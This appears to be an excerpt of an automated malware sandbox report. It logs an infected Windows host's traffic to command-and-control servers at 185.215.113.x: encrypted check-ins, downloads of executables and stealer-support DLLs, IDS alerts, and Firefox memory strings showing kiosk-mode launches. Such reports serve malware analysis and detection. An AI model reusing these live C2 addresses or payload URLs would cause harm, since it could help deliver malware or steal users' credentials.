Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49803 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49742 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49921 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50011 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50039 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50039 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50027 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C61CC60 PR_Recv,

6_2_6C61CC60

Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN 'www.' \|\| :strippedURL AND 'www.' \|\| :strippedURL \|\| X'FFFF'moz-extension://31bc1824-4b8f-4b01-9a19-e1bd57d398cf/lib/picture_in_picture_overrides.js[{incognito:null, tabId:null, types:["image"], urls:["https://smartblock.firefox.etp/facebook.svg", "https://smartblock.firefox.etp/play.svg"], windowId:null}, ["blocking"]]Could not access the AddonManager to upgrade the profile. This is most likely because the upgrader is being run from an xpcshell test where the AddonManager is not initialized.sharing,pictureinpicture,crashed,busy,soundplaying,soundplaying-scheduledremoval,pinned,muted,blocked,selected=visuallyselected,activemedia-blocked,indicator-replaces-faviconX! equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://.adsafeprotected.com/jload""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com/jload?""://pubads.g.doubleclick.net/gampad/ad""://pixel.advertising.com/firefox-etp""://pubads.g.doubleclick.net/gampad/ad-blk""://.adsafeprotected.com/jsvid""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com/tpl?"["://trends.google.com/trends/embed"]"://trends.google.com/trends/embed"["://trends.google.com/trends/embed"]resource://gre/modules/PlacesUtils.sys.mjs"://trends.google.com/trends/embed""://.adsafeprotected.com/services/pub""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/.png""://securepubads.g.doubleclick.net/gampad/ad""://ads.stickyadstv.com/auto-user-sync""://.adsafeprotected.com//Serving/""://.adsafeprotected.com//unit/""://track.adform.net/Serving/TrackPoint/""://.adsafeprotected.com/.js""://.adsafeprotected.com/.gif""://.adsafeprotected.com/services/pub""://.adsafeprotected.com/tpl?""://cdn.cmp.advertising.com/firefox-etp""://vast.adsafeprotected.com/vast""://www.facebook.com/platform/impression.php""://.adsafeprotected.com//adj""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com//imp/"resource:///modules/AttributionCode.sys.mjsmain/anti-tracking-url-decorationChild MenuItem not found, it cannot be removed.Could not find any MenuItem with id: getProfileDataAsGzippedArrayBuffermain/anti-tracking-url-decorationresource:///modules/ShellService.sys.mjs:scope > #context-sep-navigation + *, falling back to typed transition.resource://normandy/lib/NormandyUtils.sys.mjsresource://gre/modules/TelemetryArchive.sys.mjsresource://gre/modules/UpdateUtils.sys.mjsresource:///modules/BrowserWindowTracker.sys.mjsresource:///modules/UrlbarUtils.sys.mjsID of a MenuItem cannot be changedservices.sync.clients.devices.mobilemain/translations-identification-modelswebNavigation-createdNavigationTargetChild MenuItem already has a parent.resource://gre/modules/ExtensionParent.sys.mjsgetAndForgetRecentTabTransitionDatamain/websites-with-shared-credential-backendsservices.sync.clients.devices.desktop60e82333-914d-4cfa-95b1-5f034b5a704bresource://gre/modules/AddonManager.sys.mjsUnexpectedly received notification for resource://gre/modules/AsyncShutdown.sys.mjsthis.menusInternal</onClicked/listener/<main/devtools-compatibility-browsersresource:///actors/ClickHandlerParent.sys.mjsresource://gre/modules/WebNavigation.jsmmain/search-default-override-allowlistchrome://browser/content/browser.xhtmlchrome://browser/content/browser.xhtmlchrome://browser/content/browser.xhtmlchrome://browser/content/browser.xhtmlbrowser.laterrun.bookkeeping.profileCreationTimechrome://browser/content/browser.jsbrowser.laterrun.bookkeeping.sessionCount[xpconnect wrapped nsIMutableArray]resource://gre/modules/ObjectUtils.sys.mjschrome://browser/content/browser.xhtmlchrome://browser/content/browser.xhtmlbrowser.newtabpage.activity-stream.debugtimestamps.about_home_topsites_first_paint_s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://.adsafeprotected.com/services/pub"extensionTypes.ExtensionFileOrCode"://vast.adsafeprotected.com/vast"webRequestFilterResponse.serviceWorkerScript"://.adsafeprotected.com/.gif""://.adsafeprotected.com/.png"This color property is ignored in Firefox >= 89.webRequestBlockingPermissionRequiredMAX_SUSTAINED_WRITE_OPERATIONS_PER_MINUTEPlease use $(ref:runtime.onRestartRequired).^(sha256\|sha512):[0-9a-fA-F]{64,128}$"://www.facebook.com/platform/impression.php""://ads.stickyadstv.com/auto-user-sync""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com//imp/"webRequestBlockingPermissionRequired"://.adsafeprotected.com//adj""://.adsafeprotected.com/jload?""://.adsafeprotected.com//Serving/""://pubads.g.doubleclick.net/gampad/ad"webRequestBlockingPermissionRequired"https://ads.stickyadstv.com/firefox-etp"webRequestBlockingPermissionRequired"://.adsafeprotected.com/.js""://.adsafeprotected.com/jsvid"default_public_and_private_interfaces"://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com//unit/""://.adsafeprotected.com/jload"reject_trackers_and_partition_foreign"://.adsafeprotected.com/tpl?""://track.adform.net/Serving/TrackPoint/""://vast.adsafeprotected.com/vast""://pubads.g.doubleclick.net/gampad/ad-blk""https://ads.stickyadstv.com/firefox-etp""://ads.stickyadstv.com/auto-user-sync""://www.facebook.com/platform/impression.php""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/.gif""://.adsafeprotected.com/.png""://.adsafeprotected.com/.js""://.adsafeprotected.com//adj""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com//Serving/""://.adsafeprotected.com//unit/""://.adsafeprotected.com//imp/""://.adsafeprotected.com/jload""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/jload?""://.adsafeprotected.com/jsvid""*://pixel.advertising.com/firefox-etp" equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://www.facebook.com/platform/impression.php" equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingR equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation9 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingg equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php://.adsafeprotected.com/jsvid?*://pubads.g.doubleclick.net/gampad/xml_vmap1*://.adsafeprotected.com//imp/executeIDB/promise</transaction.onabort equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2953836439.000001E7529D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -os-restarted --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingH equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3007396139.000001E765053000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3001116838.000001E764D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997633717.000001E763CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E7639ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2959104555.000001E754590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsP equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking% equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking--attempting-deelevation equals www.facebook.com (Facebook)
